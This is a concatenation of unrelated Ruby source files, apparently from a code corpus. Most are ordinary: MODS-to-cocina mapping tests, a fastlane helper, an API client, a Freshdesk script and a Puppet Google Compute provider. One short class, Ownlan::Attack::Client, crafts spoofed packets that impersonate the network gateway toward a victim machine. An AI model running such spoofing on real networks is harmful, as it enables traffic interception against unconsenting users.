type: 'uniform',
source: {
uri: 'http://id.loc.gov/authorities/names/',
code: 'naf'
},
uri: 'http://id.loc.gov/authorities/names/n80008522'
}
],
contributor: [
{
name: [
{
value: 'Shakespeare, William, 1564-1616',
uri: 'http://id.loc.gov/authorities/names/n78095332',
source: {
uri: 'http://id.loc.gov/authorities/names/',
code: 'naf'
}
}
],
status: 'primary',
type: 'person'
}
]
}
end
end
end
describe 'Uniform title with multiple namePart subelements' do
it_behaves_like 'MODS cocina mapping' do
let(:mods) do
<<~XML
<titleInfo type="uniform" nameTitleGroup="1">
<title>Princesse jaune. Vocal score</title>
</titleInfo>
<name type="personal" usage="primary" nameTitleGroup="1">
<namePart type="family">Saint-Saëns</namePart>
<namePart type="given">Camille</namePart>
<namePart type="date">1835-1921</namePart>
</name>
XML
end
let(:cocina) do
{
title: [
{
structuredValue: [
{
value: 'Princesse jaune. Vocal score',
type: 'title'
},
{
structuredValue: [
{
value: 'Saint-Saëns',
type: 'surname'
},
{
value: 'Camille',
type: 'forename'
},
{
value: '1835-1921',
type: 'life dates'
}
],
type: 'name'
}
],
type: 'uniform'
}
],
contributor: [
{
name: [
{
structuredValue: [
{
value: 'Saint-Saëns',
type: 'surname'
},
{
value: 'Camille',
type: 'forename'
},
{
value: '1835-1921',
type: 'life dates'
}
]
}
],
type: 'person',
status: 'primary'
}
]
}
end
end
end
describe 'Name-title authority plus additional contributor not part of uniform title' do
it_behaves_like 'MODS cocina mapping' do
let(:mods) do
<<~XML
<titleInfo usage="primary">
<title>Hamlet</title>
</titleInfo>
<titleInfo type="uniform" authority="naf" authorityURI="http://id.loc.gov/authorities/names/"
valueURI="http://id.loc.gov/authorities/names/n80008522" nameTitleGroup="1">
<title>Hamlet</title>
</titleInfo>
<name usage="primary" type="personal" authority="naf" authorityURI="http://id.loc.gov/authorities/names/"
valueURI="http://id.loc.gov/authorities/names/n78095332" nameTitleGroup="1">
<namePart>Shakespeare, William, 1564-1616</namePart>
</name>
<name type="personal" authority="naf" authorityURI="http://id.loc.gov/authorities/names/"
valueURI="http://id.loc.gov/authorities/names/n78088956">
<namePart>Marlowe, Christopher, 1564-1593</namePart>
</name>
XML
end
let(:cocina) do
{
title: [
{
value: 'Hamlet',
status: 'primary'
},
{
structuredValue: [
{
value: 'Hamlet',
type: 'title'
},
{
value: 'Shakespeare, William, 1564-1616',
type: 'name',
uri: 'http://id.loc.gov/authorities/names/n78095332',
source: {
uri: 'http://id.loc.gov/authorities/names/',
code: 'naf'
}
}
],
type: 'uniform',
uri: 'http://id.loc.gov/authorities/names/n80008522',
source: {
uri: 'http://id.loc.gov/authorities/names/',
code: 'naf'
}
}
],
contributor: [
{
name: [
{
value: 'Shakespeare, William, 1564-1616',
uri: 'http://id.loc.gov/authorities/names/n78095332',
source: {
uri: 'http://id.loc.gov/authorities/names/',
code: 'naf'
}
}
],
type: 'person',
status: 'primary'
},
{
name: [
{
value: 'Marlowe, Christopher, 1564-1593',
uri: 'http://id.loc.gov/authorities/names/n78088956',
source: {
uri: 'http://id.loc.gov/authorities/names/',
code: 'naf'
}
}
],
type: 'person'
}
]
}
end
end
end
describe 'Uniform title with repetition of author' do
# Adapted from kd992vz2371
it_behaves_like 'MODS cocina mapping' do
let(:mods) do
<<~XML
<titleInfo type="uniform" nameTitleGroup="1">
<title>Roman de la Rose. 1878</title>
</titleInfo>
<name type="personal" usage="primary" nameTitleGroup="1">
<namePart>Guillaume</namePart>
<namePart type="termsOfAddress">de Lorris</namePart>
<namePart type="date">active 1230</namePart>
</name>
<name type="personal">
<namePart>Guillaume</namePart>
<namePart type="termsOfAddress">de Lorris</namePart>
<namePart type="date">active 1230</namePart>
</name>
XML
end
# Ignore usage and nameTitleGroup when determining duplication
let(:roundtrip_mods) do
<<~XML
<titleInfo type="uniform" nameTitleGroup="1">
<title>Roman de la Rose. 1878</title>
</titleInfo>
<name type="personal" usage="primary" nameTitleGroup="1">
<namePart>Guillaume</namePart>
<namePart type="termsOfAddress">de Lorris</namePart>
<namePart type="date">active 1230</namePart>
</name>
XML
end
let(:cocina) do
{
title: [
{
structuredValue: [
{
value: 'Roman de la Rose. 1878',
type: 'title'
},
{
structuredValue: [
{
value: 'Guillaume',
type: 'name'
},
{
value: 'de Lorris',
type: 'term of address'
},
# Type 'activity dates' when value starts with 'active', 'fl', or 'floruit'
{
value: 'active 1230',
type: 'activity dates'
}
],
type: 'name'
}
],
type: 'uniform'
}
],
contributor: [
{
name: [
{
structuredValue: [
{
value: 'Guillaume',
type: 'name'
},
{
value: 'de Lorris',
type: 'term of address'
},
{
value: 'active 1230',
type: 'activity dates'
}
]
}
],
type: 'person',
status: 'primary'
}
]
}
end
      let(:warnings) do
        [
          Notification.new(msg: 'Duplicate name entry')
        ]
      end
    end
  end
describe 'Supplied title' do
# How to ID: titleInfo supplied="yes"
it_behaves_like 'MODS cocina mapping' do
let(:mods) do
<<~XML
<titleInfo supplied="yes">
<title>"Because I could not stop for death"</title>
</titleInfo>
XML
end
let(:cocina) do
{
title: [
{
value: '"Because I could not stop for death"',
type: 'supplied'
}
]
}
end
end
end
describe 'Abbreviated title' do
# How to ID: titleInfo type="abbreviated"
it_behaves_like 'MODS cocina mapping' do
let(:mods) do
<<~XML
<titleInfo usage="primary">
<title>Annual report of notifiable diseases</title>
</titleInfo>
<titleInfo type="abbreviated" authority="dnlm">
<title>Annu. rep. notif. dis.</title>
</titleInfo>
XML
end
let(:cocina) do
{
title: [
{
value: 'Annual report of notifiable diseases',
status: 'primary'
},
{
value: 'Annu. rep. notif. dis.',
type: 'abbreviated',
source: {
code: 'dnlm'
}
}
]
}
end
end
end
describe 'Parallel titles' do
# How to ID: edge case requiring manual review of records with multiple titleInfo type="translated" instances
xit 'not implemented: multiple type="translated" edge case' do
let(:mods) do
<<~XML
<titleInfo type="translated" lang="ger" altRepGroup="1">
<title>Berliner Mauer Kunst</title>
</titleInfo>
<titleInfo type="translated" lang="eng" altRepGroup="1">
<title>Berlin's wall art</title>
</titleInfo>
<titleInfo type="translated" lang="spa" altRepGroup="1">
<title>Arte en el muro de Berlin</title>
</titleInfo>
XML
end
let(:cocina) do
{
title: [
{
parallelValue: [
{
value: 'Berliner Mauer Kunst',
valueLanguage: {
code: 'ger',
source: {
code: 'iso639-2b'
}
}
},
{
value: "Berlin's wall art",
valueLanguage: {
code: 'eng',
source: {
code: 'iso639-2b'
}
}
},
{
value: 'Arte en el muro de Berlin',
valueLanguage: {
code: 'spa',
source: {
code: 'iso639-2b'
}
}
}
],
type: 'parallel'
}
]
}
end
end
end
describe 'Multiple untyped titles without primary' do
it_behaves_like 'MODS cocina mapping' do
let(:mods) do
<<~XML
<titleInfo>
<title>Symphony no. 6</title>
</titleInfo>
<titleInfo>
<title>Pastoral symphony</title>
</titleInfo>
XML
end
let(:cocina) do
{
title: [
{
value: 'Symphony no. 6'
},
{
value: 'Pastoral symphony'
}
]
}
end
end
end
describe 'Multiple typed titles without primary' do
it_behaves_like 'MODS cocina mapping' do
let(:mods) do
<<~XML
<titleInfo>
<title>Symphony no. 6</title>
</titleInfo>
<titleInfo type="alternative">
<title>Pastoral symphony</title>
</titleInfo>
XML
end
let(:cocina) do
{
title: [
{
value: 'Symphony no. 6'
},
{
value: 'Pastoral symphony',
type: 'alternative'
}
]
}
end
end
end
describe 'Title with display label' do
it_behaves_like 'MODS cocina mapping' do
let(:mods) do
<<~XML
<titleInfo usage="primary">
<title>Unnatural death</title>
</titleInfo>
<titleInfo type="alternative" displayLabel="Original U.S. title">
<title>The Dawson pedigree</title>
</titleInfo>
XML
end
let(:cocina) do
{
title: [
{
value: 'Unnatural death',
status: 'primary'
},
{
value: 'The Dawson pedigree',
type: 'alternative',
displayLabel: 'Original U.S. title'
}
]
}
end
end
end
describe 'Link to external value only' do
it_behaves_like 'MODS cocina mapping' do
let(:mods) do
<<~XML
<titleInfo xlink:href="http://title.org/title" />
XML
end
let(:cocina) do
{
title: [
{
valueAt: 'http://title.org/title'
}
]
}
end
end
end
describe 'Multilingual uniform title' do
it_behaves_like 'MODS cocina mapping' do
# Both <name> elements have usage="primary" so "status": "primary" maps to contributor rather than name.
let(:mods) do
<<~XML
<titleInfo>
<title>Mishnah berurah</title>
<subTitle>the classic commentary to Shulchan aruch Orach chayim, comprising the laws of daily Jewish conduct</subTitle>
</titleInfo>
<titleInfo type="uniform" nameTitleGroup="1" altRepGroup="1">
<title>Mishnah berurah. English and Hebrew</title>
</titleInfo>
<name type="personal" usage="primary" altRepGroup="2" nameTitleGroup="1">
<namePart>Israel Meir</namePart>
<namePart type="termsOfAddress">ha-Kohen</namePart>
<namePart type="date">1838-1933</namePart>
</name>
<name type="personal" altRepGroup="2" script="" nameTitleGroup="2">
<namePart>Israel Meir in Hebrew characters</namePart>
<namePart type="date">1838-1933</namePart>
</name>
<titleInfo type="uniform" nameTitleGroup="2" altRepGroup="1" script="">
<title>Mishnah berurah in Hebrew characters</title>
</titleInfo>
XML
end
let(:cocina) do
{
title: [
{
parallelValue: [
{
structuredValue: [
{
value: 'Mishnah berurah. English and Hebrew',
type: 'title'
},
{
structuredValue: [
{
value: 'Israel Meir',
type: 'name'
},
{
value: 'ha-Kohen',
type: 'term of address'
},
{
value: '1838-1933',
type: 'life dates'
}
],
type: 'name'
}
]
},
{
structuredValue: [
{
structuredValue: [
{
value: 'Israel Meir in Hebrew characters',
type: 'name'
},
{
value: '1838-1933',
type: 'life dates'
}
],
type: 'name'
},
{
value: 'Mishnah berurah in Hebrew characters',
type: 'title'
}
]
}
],
type: 'uniform'
},
{
structuredValue: [
{
value: 'Mishnah berurah',
type: 'main title'
},
{
value: 'the classic commentary to Shulchan aruch Orach chayim, comprising the laws of daily Jewish conduct',
type: 'subtitle'
}
]
}
],
contributor: [
{
name: [
{
parallelValue: [
{
structuredValue: [
{
value: 'Israel Meir',
type: 'name'
},
{
value: 'ha-Kohen',
type: 'term of address'
},
{
value: '1838-1933',
type: 'life dates'
}
],
status: 'primary'
},
{
structuredValue: [
{
value: 'Israel Meir in Hebrew characters',
type: 'name'
},
{
value: '1838-1933',
type: 'life dates'
}
]
}
],
type: 'person',
status: 'primary'
}
]
}
]
}
end
# Only change in round-trip mapping is dropping empty script attributes. In the round-trip 'name usage="primary"'
# would come from the COCINA contributor property, not the title property, which is why it's not in the COCINA title mapping above, but still in the MODS below.
let(:roundtrip_mods) do
<<~XML
<titleInfo>
<title>Mishnah berurah</title>
<subTitle>the classic commentary to Shulchan aruch Orach chayim, comprising the laws of daily Jewish conduct</subTitle>
</titleInfo>
<titleInfo type="uniform" nameTitleGroup="1" altRepGroup="1">
<title>Mishnah berurah. English and Hebrew</title>
</titleInfo>
<name type="personal" usage="primary" altRepGroup="2" nameTitleGroup="1">
<namePart>Israel Meir</namePart>
<namePart type="termsOfAddress">ha-Kohen</namePart>
<namePart type="date">1838-1933</namePart>
</name>
<name type="personal" altRepGroup="2" nameTitleGroup="2">
<namePart>Israel Meir in Hebrew characters</namePart>
<namePart type="date">1838-1933</namePart>
</name>
<titleInfo type="uniform" nameTitleGroup="2" altRepGroup="1">
<title>Mishnah berurah in Hebrew characters</title>
</titleInfo>
XML
end
end
end
describe 'Title with xml:space="preserve"' do
it_behaves_like 'MODS cocina mapping' do
let(:mods) do
<<~XML
<titleInfo>
<nonSort xml:space="preserve">A </nonSort>
<title>broken journey</title>
<subTitle>memoir of Mrs. Beatty, wife of Rev. William Beatty, Indian missionary</subTitle>
</titleInfo>
XML
end
let(:cocina) do
{
title: [
{
structuredValue: [
{
value: 'A',
type: 'nonsorting characters'
},
{
value: 'broken journey',
type: 'main title'
},
{
value: 'memoir of Mrs. Beatty, wife of Rev. William Beatty, Indian missionary',
type: 'subtitle'
}
],
note: [
{
value: '2',
type: 'nonsorting character count'
}
]
}
]
}
end
# dropped xml:space="preserve" attribute on nonSort
let(:roundtrip_mods) do
<<~XML
<titleInfo>
<nonSort>A </nonSort>
<title>broken journey</title>
<subTitle>memoir of Mrs. Beatty, wife of Rev. William Beatty, Indian missionary</subTitle>
</titleInfo>
XML
end
end
end
describe 'Uniform title with corporate author' do
it_behaves_like 'MODS cocina mapping' do
let(:mods) do
<<~XML
<titleInfo type="uniform" nameTitleGroup="1">
<title>Laws, etc. (United States code service)</title>
</titleInfo>
<name usage="primary" type="corporate" nameTitleGroup="1">
<namePart>United States</namePart>
</name>
XML
end
let(:cocina) do
{
title: [
{
structuredValue: [
{
value: 'United States',
type: 'name'
},
{
value: 'Laws, etc. (United States code service)',
type: 'title'
}
],
type: 'uniform'
}
],
contributor: [
{
name: [
{
value: 'United States'
}
],
type: 'organization',
status: 'primary'
}
]
}
end
end
end
# Data error handling
describe 'Complex multilingual title' do
it_behaves_like 'MODS cocina mapping' do
let(:mods) do
<<~XML
<titleInfo altRepGroup="1">
<title>Sefer Shaʻare ha-ḳedushah in Hebrew</title>
<subTitle>zeh sefer le-yosher ha-adam la-ʻavodat borʼo in Hebrew</subTitle>
</titleInfo>
<titleInfo altRepGroup="1">
<title>Sefer Shaʻare ha-ḳedushah</title>
<subTitle>zeh sefer le-yosher ha-adam la-ʻavodat borʼo</subTitle>
</titleInfo>
<titleInfo type="uniform" nameTitleGroup="1" altRepGroup="2">
<title>Shaʻare ha-ḳedushah</title>
</titleInfo>
<name type="personal" usage="primary" nameTitleGroup="1">
<namePart>Vital, Ḥayyim ben Joseph</namePart>
<namePart type="date">1542 or 1543-1620</namePart>
</name>
XML
end
let(:roundtrip_mods) do
<<~XML
<titleInfo altRepGroup="1">
<title>Sefer Shaʻare ha-ḳedushah in Hebrew</title>
<subTitle>zeh sefer le-yosher ha-adam la-ʻavodat borʼo in Hebrew</subTitle>
</titleInfo>
<titleInfo altRepGroup="1">
<title>Sefer Shaʻare ha-ḳedushah</title>
<subTitle>zeh sefer le-yosher ha-adam la-ʻavodat borʼo</subTitle>
</titleInfo>
<titleInfo type="uniform" nameTitleGroup="1">
<title>Shaʻare ha-ḳedushah</title>
</titleInfo>
<name type="personal" usage="primary" nameTitleGroup="1">
<namePart>Vital, Ḥayyim ben Joseph</namePart>
<namePart type="date">1542 or 1543-1620</namePart>
</name>
XML
end
let(:cocina) do
{
title: [
{
parallelValue: [
{
structuredValue: [
{
value: 'Sefer Shaʻare ha-ḳedushah in Hebrew',
type: 'main title'
},
{
value: 'zeh sefer le-yosher ha-adam la-ʻavodat borʼo in Hebrew',
type: 'subtitle'
}
]
},
{
structuredValue: [
{
value: 'Sefer Shaʻare ha-ḳedushah',
type: 'main title'
},
{
value: 'zeh sefer le-yosher ha-adam la-ʻavodat borʼo',
type: 'subtitle'
}
]
}
]
},
{
structuredValue: [
{
value: 'Shaʻare ha-ḳedushah',
type: 'title'
},
{
structuredValue: [
{
value: 'Vital, Ḥayyim ben Joseph',
type: 'name'
},
{
value: '1542 or 1543-1620',
type: 'life dates'
}
],
type: 'name'
}
],
type: 'uniform'
}
],
contributor: [
{
name: [
{
structuredValue: [
{
value: 'Vital, Ḥayyim ben Joseph',
type: 'name'
},
{
value: '1542 or 1543-1620',
type: 'life dates'
}
]
}
],
type: 'person',
status: 'primary'
}
]
}
end
end
end
describe 'Multiple titles with primary' do
it_behaves_like 'MODS cocina mapping' do
let(:mods) do
<<~XML
<titleInfo usage="primary">
<title>Title 1</title>
</titleInfo>
<titleInfo usage="primary">
<title>Title 2</title>
</titleInfo>
XML
end
let(:roundtrip_mods) do
# Drop all instances of usage="primary" after first one
<<~XML
<titleInfo usage="primary">
<title>Title 1</title>
</titleInfo>
<titleInfo>
<title>Title 2</title>
</titleInfo>
XML
end
let(:cocina) do
{
title: [
{
value: 'Title 1',
status: 'primary'
},
{
value: 'Title 2'
}
]
}
end
let(:warnings) do
[
Notification.new(msg: 'Multiple marked as primary', context: { type: 'title' })
]
end
end
end
end
| 28.527149 | 166 | 0.399662 |
39e32103122e0e31192e8052c8a602c84d7476ea | 3,372 | require 'fastlane_core/ui/ui'
module Fastlane
UI = FastlaneCore::UI unless Fastlane.const_defined?("UI")
module Helper
class InstallProvisioningProfileHelper
def self.show_message
UI.message("Hello from the install_provisioning_profile plugin helper!")
end
def self.install_profile_from_path(path)
Helper::InstallProvisioningProfileHelper.ensure_profiles_dir_created()
Helper::InstallProvisioningProfileHelper.install_profile(path)
end
def self.install_profiles_from_list(profiles_list)
filtered_profiles = profiles_list.select do |profile_path|
profile_extension = File.extname(profile_path)
profile_extension == PROFILE_EXTENSION
end
raise "There are no #{PROFILE_EXTENSION} files in list #{profiles_list}" if filtered_profiles.count == 0
Helper::InstallProvisioningProfileHelper.ensure_profiles_dir_created()
filtered_profiles.each { |profile_path|
Helper::InstallProvisioningProfileHelper.install_profile(profile_path)
}
end
def self.install_profiles_from_dir(profiles_dir)
filtered_profiles = Dir.entries(profiles_dir).select do |profile_path|
profile_extension = File.extname(profile_path)
profile_extension == PROFILE_EXTENSION
end
raise "There are no #{PROFILE_EXTENSION} files in directory #{profiles_dir}" if filtered_profiles.count == 0
Helper::InstallProvisioningProfileHelper.ensure_profiles_dir_created()
filtered_profiles.each { |profile_path|
Helper::InstallProvisioningProfileHelper.install_profile(File.join(profiles_dir, profile_path))
}
end
private
PROFILE_EXTENSION = '.mobileprovision'
DEFAULT_PROFILES_PATH = '~/Library/MobileDevice/Provisioning Profiles'
def self.ensure_profiles_dir_created()
dest_profiles_dir = File.expand_path(DEFAULT_PROFILES_PATH)
FileUtils.mkdir_p(dest_profiles_dir)
end
def self.install_profile(profile_path)
profile_file_name = File.basename(profile_path)
profile_extension = File.extname(profile_path)
raise "Incorrect file name #{profile_path}" if profile_file_name.nil?
raise "Incorrect file extension for #{profile_path}. Must be mobileprovision" if profile_extension != PROFILE_EXTENSION
require 'tmpdir'
Dir.mktmpdir('fastlane') do |dir|
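        # Pull the embedded UUID (e.g. "a1b2c3d4-e5f6-7890-abcd-ef1234567890")
        # out of the signed profile by grepping near its UUID plist key.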
err = "#{dir}/grep.err"
profile_uuid = `grep -aA1 UUID "#{profile_path}" | grep -io "[a-z0-9]\\{8\\}-[a-z0-9]\\{4\\}-[a-z0-9]\\{4\\}-[a-z0-9]\\{4\\}-[a-z0-9]\\{12\\}" 2> #{err}`
raise RuntimeError, "UUID parsing failed #{profile_path}. Exit: #{$?.exitstatus}: #{File.read(err)}" if $?.exitstatus != 0
profile_uuid = profile_uuid.strip
raise RuntimeError, "UUID is empty for file #{profile_path}" if (profile_uuid.nil? || profile_uuid.empty?)
dest_profiles_dir = File.expand_path(DEFAULT_PROFILES_PATH)
dest_profile_path = File.join(dest_profiles_dir, "#{profile_uuid}#{PROFILE_EXTENSION}")
UI.message("install_provisioning_profile: installing profile: #{profile_path} dest_profile_path: #{dest_profile_path} profile_uuid: #{profile_uuid}")
FileUtils.install(profile_path, dest_profile_path)
end
end
end
end
end
| 40.142857 | 163 | 0.700474 |
bfe3c7634c1c05eec6892766aa1e915911bcfb2a | 1,163 | # frozen_string_literal: true
require 'common/client/concerns/service_status'
require 'common/models/base'
require 'ihub/models/appointment'
module IHub
module Appointments
class Response < Common::Base
include Common::Client::Concerns::ServiceStatus
attribute :status, Integer
attribute :appointments, Array
def initialize(attributes = nil)
super(attributes) if attributes
self.status = attributes[:status]
end
def self.from(response)
all_appointments = response.body&.fetch('data', [])
new(
status: response.status,
appointments: IHub::Models::Appointment.build_all(all_appointments)
)
end
def ok?
status == 200
end
def cache?
ok?
end
def metadata
{ status: response_status }
end
def response_status
case status
when 200
RESPONSE_STATUS[:ok]
when 403
RESPONSE_STATUS[:not_authorized]
when 404
RESPONSE_STATUS[:not_found]
else
RESPONSE_STATUS[:server_error]
end
end
end
end
end
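# Construction sketch: .from only needs an object with #status and a #body
# hash, so a stubbed response works (OpenStruct used purely for illustration):
#
#   require 'ostruct'
#   resp = IHub::Appointments::Response.from(
#     OpenStruct.new(status: 200, body: { 'data' => [] })
#   )
#   resp.ok?    # => true
#   resp.cache? # => true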
| 20.767857 | 77 | 0.60877 |
38a06617f19656852ac5905f09cbbf154bb9bd3c | 838 | # Update forum information
require "rubygems"
require "rest_client"
require "json"
# Need to specify category_id and forum_id in the URL
# eg:
# site = RestClient::Resource.new("http://domain.freshdesk.com/categories/4/forums/11.json","[email protected]","test")
site = RestClient::Resource.new("http://domain.freshdesk.com/categories/[category_id]/forums/[forum_id].json","[email protected]","test")
# Forum type: 1-Questions, 2-Ideas, 3-Problems, 4-Announcements
# Forum visibility: 1-All, 2-Logged in users, 3-Agents, 4-Selected companies [need to provide customer_ids for this option]
response = site.put({:forum=>{:name=>"test",:description=>"test description",:forum_type=>3,:forum_visibility=>2,:customer_forums_attributes=>{:customer_id=>[1,2]}}},:content_type=>"application/json")
puts "response: #{response.code} \n #{response.body}" | 46.555556 | 198 | 0.757757 |
91df74a2de6e0793c4671c782adb620ce3db398d | 488 | module Ownlan
module Attack
class Client < Base
def process
generate_packet
send_packet
end
def generate_packet(target_ip = nil)
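        # Pairs the gateway's IP with the configured source MAC and aims the
        # frame at the victim, poisoning the victim's view of the gateway.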
gw_ip = ServiceObjects::NetworkInformation.gateway_ip
saddr = config.source_mac
daddr = config.victim_mac || victim_mac
saddr_ip = gw_ip
daddr_ip = victim_ip
@crafted_packet = packet_craft(saddr, daddr, saddr_ip, daddr_ip).call
end
end
end
end
| 19.52 | 77 | 0.625 |
ac81831d11919eaaa66c08e6b957b6125e27f45e | 116 | define :openldap_client, :mothra => "a big monster" do
cat "#{params[:name]}" do
pretty_kitty true
end
end
| 19.333333 | 54 | 0.663793 |
1c766c4e839256c2f4c098ba22da03d5523a5dcc | 10,391 | # Copyright 2018 Google Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ----------------------------------------------------------------------------
#
# *** AUTO GENERATED CODE *** AUTO GENERATED CODE ***
#
# ----------------------------------------------------------------------------
#
# This file is automatically generated by Magic Modules and manual
# changes will be clobbered when the file is regenerated.
#
# Please read more about how to change this file in README.md and
# CONTRIBUTING.md located at the root of this package.
#
# ----------------------------------------------------------------------------
require 'google/compute/network/delete'
require 'google/compute/network/get'
require 'google/compute/network/post'
require 'google/compute/network/put'
require 'google/compute/property/address_address_type'
require 'google/compute/property/enum'
require 'google/compute/property/integer'
require 'google/compute/property/region_name'
require 'google/compute/property/string'
require 'google/compute/property/string_array'
require 'google/compute/property/subnetwork_selflink'
require 'google/compute/property/time'
require 'google/hash_utils'
require 'google/object_store'
require 'puppet'
Puppet::Type.type(:gcompute_address).provide(:google) do
mk_resource_methods
def self.instances
debug('instances')
raise [
'"puppet resource" is not supported at the moment:',
'TODO(nelsonjr): https://goto.google.com/graphite-bugs-view?id=167'
].join(' ')
end
def self.prefetch(resources)
debug('prefetch')
resources.each do |name, resource|
project = resource[:project]
debug("prefetch #{name}") if project.nil?
debug("prefetch #{name} @ #{project}") unless project.nil?
fetch = fetch_resource(resource, self_link(resource), 'compute#address')
resource.provider = present(name, fetch) unless fetch.nil?
Google::ObjectStore.instance.add(:gcompute_address, resource)
end
end
def self.present(name, fetch)
result = new({ title: name, ensure: :present }.merge(fetch_to_hash(fetch)))
result.instance_variable_set(:@fetched, fetch)
result
end
def self.fetch_to_hash(fetch)
{
address: Google::Compute::Property::String.api_munge(fetch['address']),
address_type: Google::Compute::Property::AddressTypeEnum.api_munge(fetch['addressType']),
creation_timestamp: Google::Compute::Property::Time.api_munge(fetch['creationTimestamp']),
description: Google::Compute::Property::String.api_munge(fetch['description']),
id: Google::Compute::Property::Integer.api_munge(fetch['id']),
name: Google::Compute::Property::String.api_munge(fetch['name']),
network_tier: Google::Compute::Property::Enum.api_munge(fetch['networkTier']),
subnetwork: Google::Compute::Property::SubnetworkSelfLinkRef.api_munge(fetch['subnetwork']),
users: Google::Compute::Property::StringArray.api_munge(fetch['users'])
}.reject { |_, v| v.nil? }
end
def exists?
debug("exists? #{@property_hash[:ensure] == :present}")
@property_hash[:ensure] == :present
end
def create
debug('create')
@created = true
create_req = Google::Compute::Network::Post.new(collection(@resource),
fetch_auth(@resource),
'application/json',
resource_to_request)
@fetched = wait_for_operation create_req.send, @resource
@property_hash[:ensure] = :present
end
def destroy
debug('destroy')
@deleted = true
delete_req = Google::Compute::Network::Delete.new(self_link(@resource),
fetch_auth(@resource))
wait_for_operation delete_req.send, @resource
@property_hash[:ensure] = :absent
end
def flush
debug('flush')
# return on !@dirty is for aiding testing (puppet already guarantees that)
return if @created || @deleted || !@dirty
raise 'Address cannot be edited.'
end
def dirty(field, from, to)
@dirty = {} if @dirty.nil?
@dirty[field] = {
from: from,
to: to
}
end
def exports
{
address: @fetched['address'],
self_link: @fetched['selfLink']
}
end
private
def self.resource_to_hash(resource)
{
project: resource[:project],
name: resource[:name],
kind: 'compute#address',
address: resource[:address],
address_type: resource[:address_type],
creation_timestamp: resource[:creation_timestamp],
description: resource[:description],
id: resource[:id],
network_tier: resource[:network_tier],
subnetwork: resource[:subnetwork],
users: resource[:users],
region: resource[:region]
}.reject { |_, v| v.nil? }
end
def resource_to_request
request = {
kind: 'compute#address',
address: @resource[:address],
addressType: @resource[:address_type],
description: @resource[:description],
name: @resource[:name],
networkTier: @resource[:network_tier],
subnetwork: @resource[:subnetwork]
}.reject { |_, v| v.nil? }
debug "request: #{request}" unless ENV['PUPPET_HTTP_DEBUG'].nil?
request.to_json
end
def fetch_auth(resource)
self.class.fetch_auth(resource)
end
def self.fetch_auth(resource)
Puppet::Type.type(:gauth_credential).fetch(resource)
end
def debug(message)
puts("DEBUG: #{message}") if ENV['PUPPET_HTTP_VERBOSE']
super(message)
end
def self.collection(data)
URI.join(
'https://www.googleapis.com/compute/v1/',
expand_variables(
'projects/{{project}}/regions/{{region}}/addresses',
data
)
)
end
def collection(data)
self.class.collection(data)
end
def self.self_link(data)
URI.join(
'https://www.googleapis.com/compute/v1/',
expand_variables(
'projects/{{project}}/regions/{{region}}/addresses/{{name}}',
data
)
)
end
def self_link(data)
self.class.self_link(data)
end
# rubocop:disable Metrics/CyclomaticComplexity
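  # Validates an HTTP response: raises on API errors, returns nil for allowed 404s and 204s, otherwise the parsed JSON body.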
def self.return_if_object(response, kind, allow_not_found = false)
raise "Bad response: #{response.body}" \
if response.is_a?(Net::HTTPBadRequest)
raise "Bad response: #{response}" \
unless response.is_a?(Net::HTTPResponse)
return if response.is_a?(Net::HTTPNotFound) && allow_not_found
return if response.is_a?(Net::HTTPNoContent)
result = JSON.parse(response.body)
raise_if_errors result, %w[error errors], 'message'
raise "Bad response: #{response}" unless response.is_a?(Net::HTTPOK)
result
end
# rubocop:enable Metrics/CyclomaticComplexity
def return_if_object(response, kind, allow_not_found = false)
self.class.return_if_object(response, kind, allow_not_found)
end
def self.extract_variables(template)
template.scan(/{{[^}]*}}/).map { |v| v.gsub(/{{([^}]*)}}/, '\1') }
.map(&:to_sym)
end
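  # Substitutes {{var}} placeholders in the template with URL-escaped values taken from the resource data.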
def self.expand_variables(template, var_data, extra_data = {})
data = if var_data.class <= Hash
var_data.merge(extra_data)
else
resource_to_hash(var_data).merge(extra_data)
end
extract_variables(template).each do |v|
unless data.key?(v)
raise "Missing variable :#{v} in #{data} on #{caller.join("\n")}}"
end
template.gsub!(/{{#{v}}}/, CGI.escape(data[v].to_s))
end
template
end
def expand_variables(template, var_data, extra_data = {})
self.class.expand_variables(template, var_data, extra_data)
end
def fetch_resource(resource, self_link, kind)
self.class.fetch_resource(resource, self_link, kind)
end
def async_op_url(data, extra_data = {})
URI.join(
'https://www.googleapis.com/compute/v1/',
expand_variables(
'projects/{{project}}/regions/{{region}}/operations/{{op_id}}',
data, extra_data
)
)
end
def wait_for_operation(response, resource)
op_result = return_if_object(response, 'compute#operation')
return if op_result.nil?
status = ::Google::HashUtils.navigate(op_result, %w[status])
fetch_resource(
resource,
URI.parse(::Google::HashUtils.navigate(wait_for_completion(status,
op_result,
resource),
%w[targetLink])),
'compute#address'
)
end
def wait_for_completion(status, op_result, resource)
op_id = ::Google::HashUtils.navigate(op_result, %w[name])
op_uri = async_op_url(resource, op_id: op_id)
while status != 'DONE'
debug("Waiting for completion of operation #{op_id}")
raise_if_errors op_result, %w[error errors], 'message'
sleep 1.0
raise "Invalid result '#{status}' on gcompute_address." \
unless %w[PENDING RUNNING DONE].include?(status)
op_result = fetch_resource(resource, op_uri, 'compute#operation')
status = ::Google::HashUtils.navigate(op_result, %w[status])
end
op_result
end
def raise_if_errors(response, err_path, msg_field)
self.class.raise_if_errors(response, err_path, msg_field)
end
def self.fetch_resource(resource, self_link, kind)
get_request = ::Google::Compute::Network::Get.new(
self_link, fetch_auth(resource)
)
return_if_object get_request.send, kind, true
end
def self.raise_if_errors(response, err_path, msg_field)
errors = ::Google::HashUtils.navigate(response, err_path)
raise_error(errors, msg_field) unless errors.nil?
end
def self.raise_error(errors, msg_field)
raise IOError, ['Operation failed:',
errors.map { |e| e[msg_field] }.join(', ')].join(' ')
end
end
| 32.987302 | 98 | 0.640458 |
080ac62df2363f307d63a6ab9497ffe3c878a23d | 6,825 | #!/usr/bin/env oo-ruby
#--
# Copyright 2013 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
